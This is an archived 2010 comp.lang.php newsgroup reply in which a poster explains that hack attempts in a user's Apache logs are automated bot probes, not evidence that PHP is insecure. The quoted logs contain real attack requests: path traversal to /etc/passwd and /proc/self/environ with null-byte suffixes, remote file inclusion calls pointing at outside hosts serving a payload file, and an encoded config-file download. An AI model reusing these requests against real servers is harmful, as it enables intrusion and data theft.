FUDforum
Fast Uncompromising Discussions. FUDforum will get your users talking.

Home » Imported messages » comp.lang.php » Shocking amount of PHP security holes?
Show: Today's Messages :: Polls :: Message Navigator
Return to the default flat view Create a new topic Submit Reply
Re: Shocking amount of PHP security holes? [message #171094 is a reply to message #171084] Fri, 24 December 2010 15:56 Go to previous messageGo to previous message
Erwin Moller is currently offline  Erwin Moller
Messages: 228
Registered: September 2010
Karma:
Senior Member
On 12/23/2010 10:25 PM, Ignoramus30015 wrote:
> On 2010-12-23, Norman Peelman<npeelman(at)cfl(dot)rr(dot)com> wrote:
>> Ignoramus30015 wrote:
>>> I have been looking at my apache logs, and I see a tremendous amount
>>> of queries that clearly are attempts to hack me.
>>>
>>> One typical example
>>>
>>> 87.121.164.1 - - [22/Dec/2010:00:01:10 -0600] "GET /manuals/index.php?bi=./../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" my.site.com
>>>
>>
>> In this case apache returned a '404 Page not found'
>
> Yes, because I do not have index.php. The attacker was probing,
> hopeful to find it.
>
>>> Many other examples about, where attackers try to override system
>>> variables with web-supplied parameters. Kind of overriding PATH or
>>> LD_LIBRARY_PATH variables to subvert setuid programs.
>>>
>>> My main question is WTF? Why exactly does PHP let remote web users
>>> override those variables?
>>>
>>
>> Can you supply an example of this?
>
> Here are some from logs of algebra.com:
>
> 64.50.163.80 - - [23/Dec/2010:12:33:30 -0600] "GET /algebra/homework/Sequences-and-series//download.php?view.195/contact.php=I PCop../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 542 "-" "libwww-perl/5.837" www.algebra.com
> 109.72.95.75 - - [22/Dec/2010:03:35:48 -0600] "GET //bbs//include/print_category.php?setup[use_category]=1&dir=http://www.asdsingapore.com/includes/domit/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
> 209.62.76.194 - - [22/Dec/2010:07:09:14 -0600] "GET /algebra//dompdf/dompdf.php?input_file=http://indah1.webs.com/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
> 76.12.154.99 - - [22/Dec/2010:07:11:08 -0600] "GET //dompdf/dompdf.php?input_file=http://indah1.webs.com/fx29id1.txt??? HTTP/1.0" 500 - "-" "Mozilla/5.0" www.algebra.com
> 24.173.234.213 - - [22/Dec/2010:15:47:36 -0600] "GET /admin/file_manager.php/login.php?action=download&filename=%69%6E%63%6C %75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70 HTTP/1.0" 404 542 " http://algebra.com/admin/file_manager.php/login.php?action=download&fil ename=%69%6E%63%6C%75%64%65%73%2F%63%6F%6E%66%69%67%75%72%65%2E%70%68%70" "Mozilla/4.0 (compatible;
>

Hello,

That means nothing.
That is just some bot trying to get into poorly configured systems.
My apache access logs are filled with attempts to run dll's and stuff
that breaks into IIS.

Does that mean my Apache/PHP is poorly configured? Of course not: It
just means that the scriptkiddies that run their 'hackorzz' scanning
software are just shooting a million times, and sometimes hit bullseye
on accident.

If you don't know about filepermissions, read/write/execute and stuff
like that, it is better to NOT set up a PHP system indeed. If you do
know about Unix administration you are fine to run PHP.
That is: if PHP runs under Apache. In case people use IIS, who needs to
break into the system via PHP anyway?. (I never used anything else than
Apache / IIS and Tomcat).
In Apache PHP has often the rights of a user named www-data (or 'nobody'
or 'apache').

Take for example this one you posted:
87.121.164.1 - - [22/Dec/2010:00:01:10 -0600] "GET
/manuals/index.php?bi=./../../../../../../../../../../../etc/passwd%00
HTTP/1.0" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9
sun4u; X11)" my.site.com

It is clearly an attempt to steal passwd file from /etc/passwd.
Why a passwd file is typically readable for all users/processes on the
system, it shouldn't be wide open for the world at large.

I don't know what /manuals/index.php is supposed to do in this hack
attempt, but apparently the ?bi=xxx is a way to request a file.
Now, if this index.php is written by an idiot, chances are that it will
fetch anything requested.
This is NOT a problem with PHP, this is a problem with with running crap
software. The same can happen with *any* serverside language.
The script that runs at the server simply has the userrights of the user
it is running as.

So while I think you are wise not to run everything on your server (be
it PHP or ASP/VBscript or Perl or Java or Ruby or Python), it is a
strange thing to say this is a PHP only problem.

About the ENV being screwed up by PHP by just calling some crafted URL:
I don't think that is possible at all.

If you have an example of this: please post more information, since I am
curious.

Regards,
Erwin Moller

--
"There are two ways of constructing a software design: One way is to
make it so simple that there are obviously no deficiencies, and the
other way is to make it so complicated that there are no obvious
deficiencies. The first method is far more difficult."
-- C.A.R. Hoare
[Message index]
 
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Read Message
Previous Topic: PHP
Next Topic: PHP WEBSITE DEVELOPER REQUIRED
Goto Forum:
  

-=] Back to Top [=-
[ Syndicate this forum (XML) ] [ RSS ]

Current Time: Sat Nov 30 09:27:25 GMT 2024

Total time taken to generate the page: 0.03517 seconds